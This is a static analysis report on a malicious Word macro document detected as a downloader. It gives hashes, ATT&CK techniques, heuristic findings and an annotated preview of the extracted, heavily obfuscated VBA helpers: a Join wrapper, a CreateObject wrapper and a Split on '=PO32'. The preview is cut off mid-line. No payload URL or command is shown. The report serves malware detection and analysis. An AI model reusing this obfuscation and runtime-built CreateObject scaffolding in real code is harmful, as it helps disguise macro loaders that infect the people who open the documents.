Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fe69570cfe43c056…

MALICIOUS

Office (OLE)

189.0 KB · Created: 2020-10-22 09:38:00 · Authoring application: Microsoft Office Word (these appear to be document-property values, which the author controls — treat them as unverified and not as evidence of provenance) · First seen: 2021-11-03
MD5: 97008a311e0de846bd0e24b9e4f65347 SHA-1: 91edd766807abca9d1d3a9ce27152d19942df0e1 SHA-256: fe69570cfe43c056f36d0a40929d53d4532cd181924613bda7436913979c33cb
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open auto-execution macro, so the code runs as soon as the document is opened (typically once the user enables macros) — a common way to kick off malicious activity. The extracted source calls CreateObject with a ProgID that is passed in as a function argument rather than written as a literal, so the COM class it instantiates (and therefore what it goes on to execute) is not visible statically; the accompanying string helpers (Join, and Split on the literal delimiter "=PO32") are consistent with the ProgID and any command or URL being assembled at runtime from split-up strings. The ClamAV detection name 'Doc.Downloader.Logan-9781905-0' indicates downloader functionality, i.e. fetching and executing a second-stage payload; note that no download URL was recovered from the extracted source (the only extracted URL is a standard Office XML schema namespace), so the stage-2 location would have to come from dynamic analysis or macro emulation. The heavy obfuscation (dead-code padding, random identifiers, array sizes built from arithmetic) is itself a strong indicator of malicious intent, although it does not on its own establish the downloader verdict.

Heuristics 6

  • ClamAV: Doc.Downloader.Logan-9781905-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Logan-9781905-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard DrawingML XML namespace URI that Office writes into documents; it is not a network indicator and should not be treated as a C2 or download URL. No payload URL was recovered from the extracted macro source.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18825 bytes
SHA-256: da30aa94b28f995ffc9559eca817f363ffff3144f68117c4ed25ccf38eb07712
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "A0qw88jfmftj"
' Obfuscated string helper. The only statement that affects the return value is the
' Join(...) call below; every other statement assigns to locals that are never read
' (dead-code padding). The index variables (QAplHkeJG, ihDsFFSJA, ...) and the
' right-hand-side names are never declared or assigned anywhere in the extracted source.
'   Ck5bsno1zt6awrt : expected to be an array of string fragments (inferred from Join) — confirm
'   returns         : the fragments joined with delimiter Wbyxeyx9p0p, which is also never
'                     assigned — presumably Empty, i.e. plain concatenation — confirm by emulation
Function A3j299fve06lt5(Ck5bsno1zt6awrt)
' Likely present so the padding statements (e.g. indexing with an unset index) fail silently.
On Error Resume Next
   Set ysTFeT = VhmwHC
Dim gDdmQGIOB(8 + 8 + 1 + 4) As String
gDdmQGIOB(QAplHkeJG) = (793 + 6)
XkaRA = iFHED
gDdmQGIOB(QAplHkeJG) = (eCYTAhBPC + 6475)
gDdmQGIOB(QAplHkeJG) = (5 + 99 + tNPPGEA)
Set GfnHk = sOKDC
Dim iVwUl(6 + 6 + 1 + 8) As String
iVwUl(ihDsFFSJA) = (8714 + 3010)
sAPoBA = nQjyzfCCc
iVwUl(ihDsFFSJA) = (RRcDYbID + 9392)
iVwUl(ihDsFFSJA) = (5 + 888 + UceADHfrB)
Set hxKakJ = tCAbIEd
Dim EQBZlAGFy(6 + 7 + 1 + 8) As String
EQBZlAGFy(goptn) = (9 + 6794)
YHxkhHBFp = nXJpG
EQBZlAGFy(goptn) = (yyNTWpBA + 4)
EQBZlAGFy(goptn) = (6 + 25 + DSSbGBIC)
' The real work: reassemble the fragment array into one string.
A3j299fve06lt5 = Join(Ck5bsno1zt6awrt, Wbyxeyx9p0p)
   Set wdRjjJQF = ssDwDNdK
Dim QrPpxWD(7 + 6 + 1 + 6) As String
QrPpxWD(TVmUC) = (37 + 46)
jMoTBT = QNmKFJJ
QrPpxWD(TVmUC) = (PApkUG + 906)
QrPpxWD(TVmUC) = (940 + 129 + rMmzJEG)
Set UnZuRinn = BaUIFI
Dim QCWGc(6 + 8 + 1 + 7) As String
QCWGc(HSADYuI) = (7 + 7)
KbIomNBFq = DmOJFCPSA
QCWGc(HSADYuI) = (AOYXO + 33)
QCWGc(HSADYuI) = (3 + 154 + FKGCJoAJ)
Set uxfmILHuB = XsUjBHJ
Dim CKTMEH(6 + 5 + 1 + 5) As String
CKTMEH(cJKjKAY) = (3587 + 8)
gFeBEEOHI = lVzkInJB
CKTMEH(cJKjKAY) = (WlrbJH + 361)
CKTMEH(cJKjKAY) = (95 + 887 + LxaeC)
End Function
' Obfuscated wrapper around CreateObject. The only effective statement is the
' Set ... = CreateObject(...) call below; the rest is dead-code padding identical in
' shape to the other helpers (writes to never-read locals, undeclared names).
'   Acdp6rpmgq6prk50 : the ProgID/class name to instantiate. It is a parameter, not a
'                      literal, so the COM class (and thus what gets executed) is NOT visible
'                      in this source — presumably built at runtime by the string helpers; confirm
'                      with emulation or dynamic analysis.
'   returns          : the instantiated COM object (object reference, hence Set).
Function Xxu9xp67tuoeumtl(Acdp6rpmgq6prk50)
' Likely present so the padding statements fail silently.
On Error Resume Next
   Set jIdgIA = gysoDFU
Dim JHRaBF(6 + 6 + 1 + 8) As String
JHRaBF(lQQGp) = (6 + 48)
dwdaOiH = aUIhAGSF
JHRaBF(lQQGp) = (KQAFIF + 5)
JHRaBF(lQQGp) = (63 + 8 + xaNQAOf)
Set bfOIkvC = VweUI
Dim KbDJH(8 + 6 + 1 + 5) As String
KbDJH(WyWjnXAPC) = (26 + 8)
pGnIE = tmmZR
KbDJH(WyWjnXAPC) = (gNtGlGD + 2)
KbDJH(WyWjnXAPC) = (3 + 768 + bwBXCnDF)
Set zFPoAU = QdqpGGY
Dim mUMutMmBE(8 + 5 + 1 + 4) As String
mUMutMmBE(MFIQc) = (3 + 506)
vSfDHJpAD = shHmTdByC
mUMutMmBE(MFIQc) = (RQSQY + 5258)
mUMutMmBE(MFIQc) = (7 + 326 + YAiiGGaIw)
' The real work: instantiate whatever class the caller names (the OLE_VBA_CREATEOBJ hit).
Set Xxu9xp67tuoeumtl = CreateObject(Acdp6rpmgq6prk50)
   Set PnJNGD = HuzlVT
Dim QSGkhYDl(6 + 5 + 1 + 7) As String
QSGkhYDl(xVlti) = (1457 + 103)
wloMAFbD = mlVcLJE
QSGkhYDl(xVlti) = (UdjVcDI + 579)
QSGkhYDl(xVlti) = (1806 + 8 + paCtQ)
Set UyQuCCIIk = XdnLHK
Dim WyoYoGAI(7 + 5 + 1 + 7) As String
WyoYoGAI(ucsIGp) = (8 + 7)
hYWDo = zBEQaB
WyoYoGAI(ucsIGp) = (uOovD + 4)
WyoYoGAI(ucsIGp) = (1 + 8 + rQraB)
Set mdLTHS = rdLckC
Dim WSIcIEFT(6 + 8 + 1 + 7) As String
WSIcIEFT(cVtEIGBJ) = (8 + 3713)
vgHgDxkCH = nwFVA
WSIcIEFT(cVtEIGBJ) = (mamvGHGZx + 763)
WSIcIEFT(cVtEIGBJ) = (4 + 1 + InoiHi)
End Function
' Obfuscated string helper: splits its input on the hard-coded marker "=PO32".
' Only the Split(...) call below affects the result; everything else is dead-code padding.
'   U0wuyrvvt463 : a string containing "=PO32" separators (inferred from Split) — confirm
'   returns      : a zero-based array of the pieces between the separators
' The literal "=PO32" is the one fixed, non-random token in this module and is usable as a
' string indicator for this sample (the obfuscated payload strings presumably carry it).
Function Wb5ececqr26b(U0wuyrvvt463)
' Likely present so the padding statements fail silently.
On Error Resume Next
   Set xEREA = zNfVpACZJ
Dim QGBcEIC(8 + 7 + 1 + 6) As String
QGBcEIC(MCAFCHmQ) = (9271 + 1)
tFaCY = KFhkw
QGBcEIC(MCAFCHmQ) = (IKQxI + 749)
QGBcEIC(MCAFCHmQ) = (1 + 12 + ZeFrs)
Set JsJlu = DSVADGyC
Dim iSEPJ(7 + 6 + 1 + 8) As String
iSEPJ(rxlbDFfQ) = (7 + 4)
qiGkF = DdZSLBJJM
iSEPJ(rxlbDFfQ) = (yQGABD + 16)
iSEPJ(rxlbDFfQ) = (2150 + 4 + WITxQSC)
Set BsOmYj = ukzdIS
Dim SRFEIWGAI(8 + 8 + 1 + 8) As String
SRFEIWGAI(DXGEA) = (637 + 4)
JhpnAP = BTINH
SRFEIWGAI(DXGEA) = (oPGmPafn + 464)
SRFEIWGAI(DXGEA) = (65 + 6811 + GqKvAx)
' The real work: tokenise on the fixed marker.
Wb5ececqr26b = Split(U0wuyrvvt463, "=PO32")
   Set RrkdIHC = FlXQCDFX
Dim IobhFeF(8 + 5 + 1 + 5) As String
IobhFeF(nSOBg) = (5 + 4)
RlWCBRHG = ieDsiDBC
IobhFeF(nSOBg) = (GOqlIF + 3)
IobhFeF(nSOBg) = (2 + 84 + ecQaEyEOR)
Set NeREBDFdt = aJllzA
Dim vOxAQOFBA(5 + 7 + 1 + 6) As String
vOxAQOFBA(xlegt) = (446 + 270)
JYAcBA = SFEcJG
vOxAQOFBA(xlegt) = (EMLUPRRBD + 1)
vOxAQOFBA(xlegt) = (6374 + 1 + IJKBzC)
Set zuzXGxInI = hyrBonVDg
Dim KWghkk(7 + 6 + 1 + 4) As String
KWghkk(mFYenuCr) = (680 + 4)
lvamaHBk = yvGTC
KWghkk(mFYenuCr) = (yryMyA + 9)
KWghkk(mFYenuCr) = (9 + 28 + JnbuiJI)
End Function


Attribute VB_Name = "Xfz7gu6iysst4bk"
Attribute VB_Base = "0{EBE7B244-872C-40E7-A6F5-10D638D9F413}{BAD28B56-127A-4DDF-AE1D-5CADEC5F02F6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Fun
... (truncated)